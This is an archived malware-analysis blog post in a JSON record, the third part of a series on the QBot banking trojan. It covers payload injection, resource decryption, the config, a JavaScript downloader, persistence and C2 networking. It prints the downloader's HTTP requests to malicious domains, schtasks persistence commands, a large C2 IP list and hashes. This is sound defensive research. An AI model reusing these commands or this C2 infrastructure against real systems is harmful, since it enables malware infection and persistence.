{
	"id": "a08a488b-2443-429e-b724-2ad3786da007",
	"created_at": "2026-04-06T00:09:56.10311Z",
	"updated_at": "2026-04-10T13:13:03.832981Z",
	"deleted_at": null,
	"sha1_hash": "88fff99ed1075ea7326b569207ee73fd859f08a5",
	"title": "An old enemy – Diving into QBot part 3",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1735279,
	"plain_text": "An old enemy – Diving into QBot part 3\r\nPublished: 2020-05-05 · Archived: 2026-04-05 20:54:14 UTC\r\nHello everyone :-).\r\nI am continuing my analysis on QBot with this article. If you didn’t read my previous posts, I’ve already covered\r\nthe packer[1] as well as various QBot’s anti analysis measurements and process injection[2].\r\nIn this blog post I will explain how the jump to the actual payload is performed. I will also cover its resources,\r\ndecrypt them and take a quick look at the C2 servers which are used by this QBot sample. Finally I will finish off\r\nby talking about how QBot achieves persistence and my current progress reversing its networking capabilities.\r\nJumping to the DLL entry point\r\nOverview of how the entry point is reached\r\nAs I’ve already explained in my previous posts, QBot is packed by default and after unpacking itself, it injects\r\ninto explorer.exe via NtWriteVirtualMemory . The injected process writes the actual payload in form of a DLL\r\ninto newly allocated memory.\r\nLet’s take a look at the injected code first. It is a PE Executable and contains multiple resources. The resource with\r\nthe identifier 307 is the Dynamic Linked Library in encrypted form.\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 1 of 11\n\nResources in the mentioned PE\r\nThe mentioned resource is loaded into memory, decrypted and written onto the heap. Again a new memory area is\r\nallocated with VirtualAlloc and filled with the DLL. Finally it jumps to the entry point of the Dynamic Linked\r\nLibrary and the actual payload is running, masqueraded as explorer.exe .\r\nDissecting the DLL\r\nAfter dumping the decrypted DLL, I took a deeper look at it. We are not finished with resources here.\r\nThe Dynamic Linked Library contains more and all three of them can be decrypted again. I did not look at the\r\narithmetic details of this decryption routine, but I identified the used function.\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 2 of 11\n\nRoutine used for decrypting resources\r\nThis makes our analysis way easier, since we can just save a virtual machine state, patch the stack parameter used\r\nby FindResourceA to get a handle to one of them resources and unpack them one after another.\r\nPatching the resource to search for\r\nHere is a sum up of all three resources:\r\n307 QBot config\r\nIn [7]: hexdump.hexdump(data[0x7fa70-0x50:0x7fa70+0x100])\r\n00000000: B7 13 2A 58 DE 5F DA D2 AD 21 73 AC 71 15 37 BB ..*X._...!s.q.7.\r\n00000010: 89 E3 88 E4 9D B2 74 CF F9 DB A3 25 31 39 C8 D1 ......t....%19..\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 3 of 11\n\n00000020: 30 E3 C4 03 5C EC A9 AE 20 4E 71 C6 B9 5E E2 13 0...\\... Nq..^..\r\n00000030: 00 00 01 02 92 5B 00 0F D5 75 BE 23 9B 5B 00 08 .....[...u.#.[..\r\n00000040: 31 30 3D 73 70 78 38 35 0D 0A 33 3D 31 35 38 35 10=spx85..3=1585\r\n00000050: 32 31 31 33 30 34 0D 0A 70 78 38 35 0D 0A 33 3D 211304..px85..3=\r\n00000060: 31 35 38 35 32 31 31 33 30 34 0D 0A 00 00 00 00 1585211304......\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\nQBot is delivered with an embedded configuration. They were already covered by multiple other reports, for\r\nexample one published by Vitali Kremez[3]. It is suspected that the parameter 10 holds the botnet’s name, which\r\nwould be spx85 here. The parameter 3 might hold the config time in UNIX . I did not confirm any of those\r\nassumptions though.\r\n310 JavaScript payload\r\nThe resource with 310 identifier holds a JavaScript file which is dropped on demand. I patched the binary in\r\nsuch way so that it is decrypted on purpose.\r\nIt tries to masquerade itself as a WPL file in the user’s folder.\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 4 of 11\n\nFurthermore the following command is executed by the script in order to persist it:\r\n\"C:\\Windows\\system32\\schtasks.exe\" /create /tn {A08689C8-7EC5-4C51-9737-AFCDFCA848CC} /tr \"cmd.exe /C \\\"start /\r\nAV vendors classify this sample as a downloader and I verified this. The file tries to download different BATCH\r\nfiles from different domains and schedules them via schtasks.exe .\r\nschtasks.exe is used to run the mentioned files\r\n# HTTP requests sent to download the mentioned files\r\nGET /datacollectionservice.php3 HTTP/1.1\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 5 of 11\n\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: north.drwongandassociates.com\r\nGET /datacollectionservice.php3 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: inmotion.heatherling.com\r\nGET /datacollectionservice.php3 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: qth.w3wvg.com\r\n311 C2 Servers\r\nThe final resource contains an insane amount of IP addresses. I am confident that the last number is the destination\r\nport of the corresponding IP.\r\n174.82.131.155;0;995\r\n173.172.205.216;0;443\r\n71.233.73.222;0;995\r\n208.126.142.17;0;443\r\n68.14.210.246;0;22\r\n96.57.237.162;0;443\r\n74.138.18.247;0;443\r\n47.40.244.237;0;443\r\n71.213.61.215;0;995\r\n216.201.162.158;0;443\r\n72.38.44.119;0;995\r\n47.41.3.57;0;443\r\n67.250.184.157;0;443\r\n47.153.115.154;0;443\r\n173.79.220.156;0;443\r\n108.27.217.44;0;443\r\n75.81.25.223;0;995\r\n67.209.195.198;0;3389\r\n65.30.12.240;0;443\r\n66.222.88.126;0;995\r\n184.191.62.24;0;995\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 6 of 11\n\n79.113.157.79;0;443\r\n80.14.209.42;0;2222\r\n73.163.242.114;0;443\r\n108.185.113.12;0;443\r\n24.99.180.247;0;443\r\n75.105.224.113;0;993\r\n216.8.170.82;0;2222\r\n173.184.96.161;0;443\r\n173.175.29.210;0;443\r\n58.177.238.186;0;443\r\n87.201.206.22;0;443\r\n89.137.211.38;0;443\r\n31.5.172.53;0;443\r\n68.187.28.217;0;2222\r\n156.96.45.215;0;443\r\n89.136.105.188;0;443\r\n74.102.83.89;0;443\r\n23.24.115.181;0;443\r\n72.90.243.117;0;0\r\n188.27.16.17;0;443\r\n65.96.36.157;0;443\r\n121.123.79.63;0;443\r\n173.3.244.208;0;443\r\n86.124.109.100;0;443\r\n78.97.116.41;0;443\r\n173.22.120.11;0;2222\r\n24.202.42.48;0;2222\r\n108.54.103.234;0;443\r\n24.121.254.171;0;443\r\n47.205.150.29;0;443\r\n104.220.197.187;0;443\r\n5.15.73.173;0;443\r\n83.25.14.84;0;2222\r\n47.202.98.230;0;443\r\n24.46.40.189;0;2222\r\n72.190.124.29;0;443\r\n72.16.212.107;0;465\r\n173.3.132.17;0;995\r\n70.166.158.118;0;443\r\n24.229.245.124;0;995\r\n71.187.170.235;0;443\r\n49.191.6.183;0;995\r\n97.78.107.14;0;443\r\n174.52.64.212;0;443\r\n188.26.131.41;0;443\r\n104.34.122.18;0;443\r\n70.126.76.75;0;443\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 7 of 11\n\n24.184.5.251;0;2222\r\n201.152.111.104;0;995\r\n68.6.145.21;0;443\r\n197.207.170.78;0;443\r\n50.244.112.10;0;443\r\n72.142.106.198;0;465\r\n173.173.68.41;0;443\r\n24.110.14.40;0;443\r\n100.4.185.8;0;443\r\n72.36.59.46;0;2222\r\n41.97.3.25;0;443\r\n5.2.149.216;0;443\r\n81.103.144.77;0;443\r\n74.33.70.220;0;443\r\n71.77.231.251;0;443\r\n100.1.239.189;0;443\r\n206.169.163.147;0;995\r\n96.41.93.96;0;443\r\n98.190.24.81;0;443\r\n5.237.57.127;0;2222\r\n67.7.2.109;0;2222\r\n75.110.250.89;0;443\r\n68.204.164.222;0;443\r\n5.14.118.122;0;443\r\n24.55.152.50;0;995\r\n5.12.213.152;0;2222\r\n94.53.92.42;0;443\r\n70.57.15.187;0;993\r\n100.38.123.22;0;443\r\n78.96.177.188;0;443\r\n46.153.111.112;0;995\r\n73.226.220.56;0;443\r\n104.152.16.45;0;995\r\n70.62.160.186;0;6883\r\n216.104.200.187;0;443\r\n72.188.81.12;0;443\r\n188.27.17.115;0;443\r\n93.114.246.195;0;443\r\n73.142.81.221;0;443\r\n12.5.37.3;0;443\r\n73.169.47.57;0;443\r\n24.201.79.208;0;2078\r\n64.121.69.241;0;443\r\n184.176.139.8;0;443\r\n98.219.77.197;0;443\r\n50.29.166.232;0;995\r\n24.168.237.215;0;443\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 8 of 11\n\n206.255.163.120;0;443\r\n24.110.96.149;0;443\r\n100.40.48.96;0;443\r\n24.61.47.73;0;443\r\n68.174.15.223;0;443\r\n63.155.135.211;0;995\r\n75.82.228.209;0;443\r\n74.222.204.82;0;443\r\n77.81.20.66;0;2222\r\n47.153.115.154;0;993\r\n69.246.151.5;0;443\r\n71.77.252.14;0;2222\r\n24.37.178.158;0;443\r\n209.213.30.152;0;443\r\n86.123.95.59;0;2222\r\n72.29.181.77;0;2078\r\n64.19.74.29;0;995\r\n76.23.204.29;0;443\r\n68.49.120.179;0;443\r\n50.244.112.106;0;443\r\n98.213.28.175;0;443\r\n74.96.151.6;0;443\r\n47.180.66.10;0;443\r\n98.164.253.75;0;443\r\n188.24.255.148;0;443\r\n72.209.191.27;0;443\r\n36.77.151.211;0;443\r\n184.180.157.203;0;2222\r\n67.61.192.14;0;443\r\n71.12.214.209;0;2222\r\n70.120.149.173;0;443\r\n66.69.202.75;0;2222\r\n89.137.162.193;0;443\r\n174.126.224.51;0;443\r\n68.225.250.136;0;443\r\n225.250.136;0;443\r\nI’ve continued to investigate them and mapped them to their locations. It seems that most of them are located in\r\nthe USA:\r\nCountry Number ip addresses\r\nUSA 106\r\nRomania 20\r\nCanada 6\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 9 of 11\n\nAlgeria 2\r\nIndonesia 1\r\nUganda 1\r\nSaudi Arabia 1\r\nIran 1\r\nUnited Kingdom 1\r\nMexico 1\r\nAustralia 1\r\nHong Kong 1\r\nFrance 1\r\nUnited Arab Emirates 1\r\nMaltego graph with entered IP addresses\r\nPersistence\r\nJust as a quick reminder, the DLL file is the payload that is written memory, the PE Executable is the file that\r\ndecrypts this Dynamic Linked Library.\r\nThe DLL persists the PE Executable via task scheduling:\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 10 of 11\n\n\"C:\\Windows\\system32\\schtasks.exe\" /create /tn {16753DD8-A521-4218-A67B-D26BE4D2866C} /tr \"\\\"C:\\Users\\blackbear\r\nQBot can be executed with different parameters and before the process above was created, the PE Executable is\r\nrun with parameter /W :\r\n\"C:\\Users\\blackbeard\\AppData\\Roaming\\Microsoft\\Wgciqj\\csipij.exe\" /W\r\nThis seemed a bit irritating, as I identified this parameter to be used for debugging/testing purposes. An analysis\r\nreport at hatching.io[4] came to the same conclusion. I did not verify it, but this process might be created before to\r\ntest wether the upcoming steps will be executed properly. This is just a thesis though and I did not confirm it.\r\nNetworking\r\nBefore I am finishing my blog article here, I wanted to talk about what I’ve discovered about the sample’s\r\nnetworking capabilities.\r\nIndependent from the c2 adresses that are embedded into resources, QBot also has IP addresses which are\r\nhardcoded into the file. So far I’ve identified one of them, the decryption algorithm is the same, I’ve\r\nalready mentioned in my previous blog post[5].\r\nIt tries to fetch the victim’s IP address by sending a HTTP to ip-adress.com and parse the response.\r\nProbably sending the victim’s address to the c2 server.\r\nOne C2 server with the IP adress 23.49.13.33 is contacted on port 7000.\r\nConclusion\r\nEach time I start analysing and write about QBot, I am telling myself:\r\n“This will be my last blog post about QBot, I will finish my analysis here”\r\nWell I’ve told myself this already 2 times, so I will stop doing that ;-). There is still way more to discover and to\r\nlearn.\r\nIf I’ve made any mistakes in my analysis, feel free to tell me! I wanted to take a look at the networking\r\ncapabilities next time.\r\nStay healthy!\r\nIoCs\r\nPacked QBot : 8d4a8cca5bb7f155349143add6324252d6572122a119c47c2bb68212dc524fda\r\nUnpackedDLL : 60d6a908515ce29d568bc9d2df91ed6f121e89736fc6cf1fd3840c6ffca0fa3f\r\nExtracted JS : bf04e191be67b11a69b87d93252ababe4a186a7bc746d110c897bd355d190ffa\r\nSource: https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nhttps://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/\r\nPage 11 of 11\n\n307 QBot config In [7]: hexdump.hexdump(data[0x7fa70-0x50:0x7fa70+0x100])    \n00000000: B7 13 2A 58 DE 5F DA D2 AD 21 73 AC 71 15 37 BB ..*X._...!s.q.7.\n00000010: 89 E3 88 E4 9D B2 74 CF F9 DB A3 25 31 39 C8 D1 ......t....%19..\n   Page 3 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/"
	],
	"report_names": [
		"an-old-enemy-diving-into-qbot-part-3"
	],
	"threat_actors": [],
	"ts_created_at": 1775434196,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88fff99ed1075ea7326b569207ee73fd859f08a5.pdf",
		"text": "https://archive.orkl.eu/88fff99ed1075ea7326b569207ee73fd859f08a5.txt",
		"img": "https://archive.orkl.eu/88fff99ed1075ea7326b569207ee73fd859f08a5.jpg"
	}
}